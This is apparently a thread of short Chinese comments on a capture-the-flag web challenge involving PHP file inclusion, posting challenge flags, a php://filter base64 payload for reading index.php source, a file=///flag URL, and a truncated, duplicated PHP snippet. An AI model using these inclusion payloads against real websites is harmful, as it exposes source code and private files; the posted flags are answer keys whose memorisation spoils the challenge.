
跟南邮ctf一摸一样

flag{b8aba5bfc55997b3368ac7b88fe3854f}

http://xxxxxxxxxxxxx/index.php?file=///flag

php伪协议的简单利用

石

过分了,谁都知道是伪协议

?file=php://filter/read=convert.base64-encode/resource=index.php

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg
flag{0e6cd91a87d0df4e99802a322b41c74b}